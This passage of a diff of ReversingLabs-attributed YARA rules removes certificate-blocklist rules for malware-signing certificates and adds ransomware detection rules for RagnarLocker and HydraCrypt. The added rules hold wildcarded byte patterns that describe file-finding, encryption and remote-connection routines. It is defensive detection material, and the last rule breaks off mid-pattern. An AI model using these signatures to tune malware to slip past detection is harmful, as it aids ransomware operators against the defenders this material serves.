75 ?? C7 45 ?? ?? ?? + ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF + 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF + 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 + } + $enum_shares_p2 = { + 8D 46 ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? FF 36 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B + 7D ?? 72 ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 6A + ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 + 5D C2 + } + $find_files = { + 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? + 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 + 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA ?? 75 ?? 8D 43 ?? 3B C8 74 ?? + 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF 80 FA ?? 74 ?? 80 FA ?? 74 ?? + 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 + C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? + ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 + 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D + ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? + ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 80 BD ?? + ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 + ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 75 + ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B FF 56 57 + 8B F9 8B 37 EB ?? FF 36 E8 ?? ?? ?? ?? 59 83 C6 ?? 3B 77 ?? 75 ?? FF 37 E8 ?? ?? ?? + ?? 59 5F 5E C3 + } + $encrypt_files_p1 = { + 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8B 75 ?? 8D 44 24 ?? 57 50 C6 44 + 24 ?? ?? FF 36 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 8B + 44 24 ?? 81 E9 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 D8 ?? 6A ?? 6A ?? 50 51 FF 36 FF D7 + 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ?? + 81 BC 24 ?? ?? ?? ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 + D2 69 C0 ?? ?? ?? ?? 89 4C 24 ?? 8B 4C 24 ?? 89 8C 24 ?? ?? ?? ?? 83 C9 ?? 51 40 C7 + 44 24 ?? ?? ?? ?? ?? F7 F1 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 + C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 54 24 ?? 89 94 + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ?? + ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ?? 6A ?? 6A ?? 0F + 11 84 24 ?? ?? ?? ?? 0F 57 C0 66 0F 13 44 24 ?? 8B 44 24 ?? 50 89 44 24 ?? 8B 44 24 + ?? 50 FF 36 89 44 24 ?? FF D7 6A ?? 8D 44 24 ?? 0F 57 C0 50 68 ?? ?? ?? ?? 8D 84 24 + ?? ?? ?? ?? 66 0F 13 44 24 ?? 50 FF 36 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 85 + C0 0F 84 + } + $encrypt_files_p2 = { + 6A ?? 6A ?? FF 74 24 ?? 0F 11 84 24 ?? ?? ?? ?? FF 74 24 ?? FF 36 FF 15 ?? ?? ?? ?? + 6A ?? 8D 44 24 ?? 50 FF 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ?? 8B + 84 24 ?? ?? ?? ?? 8B C8 85 C0 B8 ?? ?? ?? ?? 6A ?? 0F 44 C8 69 44 24 ?? ?? ?? ?? ?? + 33 D2 6A ?? 40 89 44 24 ?? F7 F1 8B 4C 24 ?? 33 C0 83 C2 ?? 13 C0 01 54 24 ?? 13 C8 + 8B 44 24 ?? 89 4C 24 ?? 0F A4 C1 ?? C1 E0 ?? 51 50 FF 36 89 4C 24 ?? 89 44 24 ?? FF + 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF + 15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 + 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? C7 84 24 ?? ?? ?? + ?? ?? ?? ?? ?? 6A ?? 6A ?? FF D7 8B 35 ?? ?? ?? ?? 50 FF D6 6A ?? 6A ?? 89 44 24 ?? + FF D7 50 FF D6 6A ?? 6A ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? + ?? FF D7 50 FF D6 6A ?? 6A ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? + ?? ?? FF D7 50 FF D6 + } + $encrypt_files_p3 = { + 6A ?? 6A ?? 66 0F 13 44 24 ?? FF 74 24 ?? FF 74 24 ?? FF 36 FF 15 ?? ?? ?? ?? 6A ?? + 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ?? C6 44 + 24 ?? ?? FF 36 FF 15 ?? ?? ?? ?? 80 7C 24 ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 83 C6 ?? + 56 FF 15 ?? ?? ?? ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D + 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? + 8B 75 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BUSTER ASSISTENCIA TECNICA ELETRONICA LTDA - ME" and pe.signatures[i].serial=="0a:38:9b:95:ee:73:6d:d1:3b:c0:ed:74:3f:d7:4d:2f" and 1351814399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($enum_shares_p*)) and ($find_files) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_1A3Faaeb3A8B93B2394Fec36345996E6 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Ragnarlocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects RagnarLocker ransomware." author = "ReversingLabs" - id = "343e4dbe-21a6-5758-be81-e5e7918c54fa" - date = "2023-11-08" - modified = "2023-11-08" + id = "3bc3765a-f1f8-59bc-bbe8-6821654b334f" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L657-L673" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a3bd9aaba8dbdb340b5d3013684584524eb08b11339985ba6ca0291b8c8bc692" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.RagnarLocker.yara#L1-L108" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "398f0e5e003f87edf90cdea718be6b10470df317214d00db4dc6c4cccc5b6748" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "RagnarLocker" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "salvatore macchiarella" and pe.signatures[i].serial=="1a:3f:aa:eb:3a:8b:93:b2:39:4f:ec:36:34:59:96:e6" and 1468454400<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_1A35Acce5B0C77206B1C3Dc2A6A2417C : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "0e42ffb8-07f2-55e4-977d-7760e923d76d" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L675-L691" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ce161fdd511e0efa042516ead09c6ab5f8dcf54f2087cdccbfed8e7cdfbd25b2" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 33 C0 B9 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 8B 75 ?? 57 + 8D BD ?? ?? ?? ?? F3 AB 8B 3D ?? ?? ?? ?? 39 45 ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D + 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 + ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D3 + } + $find_files_p2 = { + 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? + ?? 83 FB ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? FF 74 B5 ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? + ?? 46 83 FE ?? 7C ?? 33 C0 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 + 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 50 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 + FF D6 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 50 FF D6 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D6 6A ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? + ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? + ?? ?? 8B 45 ?? 8B 1D ?? ?? ?? ?? 8B 75 ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + 56 FF D3 + } + $find_files_p3 = { + 33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 90 FF 74 B5 ?? + 53 FF D7 85 C0 74 ?? 46 83 FE ?? 72 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 8B 45 ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? E9 + ?? ?? ?? ?? 5F 5E 32 C0 5B 8B E5 5D C3 FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E B0 ?? 5B 8B + E5 5D C3 + } + $encrypt_files_p1 = { + 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 83 C4 ?? 68 ?? ?? ?? ?? 50 FF D7 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D7 56 8B 35 ?? ?? + ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 50 FF D6 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 50 68 ?? ?? ?? ?? FF D6 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8B F0 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? + ?? ?? 8B F8 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? + ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 + } + $encrypt_files_p2 = { + 8D 45 ?? 50 57 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? + 57 50 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? + 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 8B 35 ?? ?? ?? + ?? 8D 4D ?? 6A ?? 51 FF 75 ?? FF 75 ?? 50 FF D6 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 68 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 + C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 50 8D 85 ?? ?? ?? ?? + 50 FF 75 ?? FF D6 8B 45 ?? 50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? + ?? ?? ?? FF D0 FF 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF ?? ?? + ?? ?? 89 45 ?? 8D 57 ?? 8B CF D3 E8 A8 ?? 0F 84 ?? ?? ?? ?? 8D 47 ?? C7 45 ?? ?? ?? + ?? ?? 66 89 45 ?? 33 F6 33 C0 50 50 50 50 50 68 ?? ?? ?? ?? 50 66 89 45 ?? 8D 45 ?? + 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? + ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? + ?? 66 8B 85 ?? ?? ?? ?? 66 3B 45 ?? 75 ?? 66 8B 85 ?? ?? ?? ?? 66 3B 45 ?? B8 ?? ?? + ?? ?? 0F 44 F0 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? + ?? ?? ?? 83 EF ?? 8B 45 ?? 0F 89 ?? ?? ?? ?? 0F 57 C0 C7 85 + } + $encrypt_files_p3 = { + 0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? + 0F 29 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 68 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 68 + ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? + ?? ?? B8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 6A ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 + FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? + 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 + C0 74 ?? FF 75 ?? 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF D6 6A ?? FF 15 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "cd ingegneri associati srl" and pe.signatures[i].serial=="1a:35:ac:ce:5b:0c:77:20:6b:1c:3d:c2:a6:a2:41:7c" and 1166054399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_6Eb40Ea11Eaac847B050De9B59E25Bdc : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Hydracrypt : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects HydraCrypt ransomware." author = "ReversingLabs" - id = "e9f94ae9-0158-5789-b4d2-88f750442274" - date = "2023-11-08" - modified = "2023-11-08" + id = "2e780f7c-8d6d-51c8-b65e-330cc3b17bb7" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L693-L709" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d0e7ab78fb42c9a8f19cba8e6a8b15d584651a23f1088e1f311589d46145e963" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.HydraCrypt.yara#L1-L174" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "910a6f23f06cecb8d3115ebfed42a66412dbd0d3a519e39f21df81b0c2028f48" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "HydraCrypt" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "My Free Internet Update" and pe.signatures[i].serial=="6e:b4:0e:a1:1e:aa:c8:47:b0:50:de:9b:59:e2:5b:dc" and 1062201599<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_6724340Ddbc7252F7Fb714B812A5C04D : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "2b61de88-9fea-5c3f-a7ab-db91e90b4965" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L711-L727" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bc72c2ca5f81198684233e23260831da5b9ef4e7ac5a25abbdb303eecc38bd53" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $remote_connection_1 = { + 55 8B EC 83 EC ?? 53 56 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 BE ?? ?? ?? ?? 56 + 33 DB 53 53 6A ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? + 59 59 53 53 6A ?? 53 53 6A ?? FF 75 ?? FF 75 ?? FF D0 89 45 ?? 3B C3 0F 84 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 56 53 53 68 ?? ?? ?? ?? FF 75 ?? 68 + ?? ?? ?? ?? FF 75 ?? FF D0 89 45 ?? 3B C3 0F 84 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ?? + E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 6A ?? FF D0 8B F0 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? + ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? 56 E8 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? + BF ?? ?? ?? ?? 57 89 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 56 50 57 FF 75 ?? E8 ?? ?? ?? ?? + 83 C4 ?? 5F 39 5D ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 39 5D ?? 74 ?? FF 75 ?? E8 ?? + ?? ?? ?? 59 39 5D ?? 5E 5B 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 C9 C3 + } + $remote_connection_2 = { + 55 8B EC 83 EC ?? 53 56 57 6A ?? 59 68 ?? ?? ?? ?? 33 DB BE ?? ?? ?? ?? 8D 7D ?? 6A + ?? 89 5D ?? F3 A5 E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 53 53 53 8D 4D ?? 51 FF D0 8B + F8 3B FB 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 68 + ?? ?? ?? ?? 53 53 FF 75 ?? 57 FF D0 8B F0 3B F3 75 ?? 53 E8 ?? ?? ?? ?? 59 EB ?? 68 + ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 6A ?? 8D 4D ?? 51 FF D0 68 ?? ?? ?? ?? 6A ?? + E8 ?? ?? ?? ?? 59 59 8D 4D ?? 51 6A ?? 8D 4D ?? 51 56 FF D0 39 5D ?? 75 ?? 57 E8 ?? + ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 40 EB ?? 68 ?? ?? + ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 4D ?? 51 FF D0 33 C9 3B C8 1B C0 + F7 D8 5F 5E 5B C9 C3 + } + $remote_connection_3 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 33 DB 66 A5 53 8D + 45 ?? 53 50 A4 E8 ?? ?? ?? ?? 59 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? 56 53 FF D0 56 + 50 89 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? + ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? FF D0 BF ?? ?? ?? ?? 57 50 89 45 ?? E8 ?? ?? ?? + ?? 59 59 85 DB 7E ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 8B C3 6A ?? 99 59 + F7 F9 85 D2 75 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 6A ?? + E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 8B 45 ?? 0F B6 04 03 + 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? + ?? ?? ?? 83 C4 ?? 43 3B DE 7C ?? E8 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ?? 50 56 8D 85 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 83 C4 ?? 83 7D ?? ?? BB ?? ?? ?? ?? BE ?? ?? ?? + ?? 75 ?? 53 56 57 8D 85 ?? 